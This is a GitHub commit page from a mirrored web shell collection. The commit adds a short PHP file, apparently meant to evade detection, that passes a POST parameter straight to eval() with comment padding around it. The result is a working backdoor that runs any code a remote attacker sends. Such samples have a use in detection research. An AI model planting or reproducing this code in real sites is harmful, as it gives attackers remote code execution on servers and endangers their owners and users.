1
0
mirror of https://github.com/tennc/webshell.git synced 2026-01-01 12:29:06 +00:00

Create bypass2021-01-04-01.php

from https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
This commit is contained in:
tennc
2021-01-04 21:47:58 +08:00
committed by GitHub
parent a6546d03ee
commit eafae576c9

View File

@@ -0,0 +1,11 @@
<?php
function x()
{
return "/*sasas23123*/".$_POST['a']."/*sdfw3123*/";
}
eval(x());
?>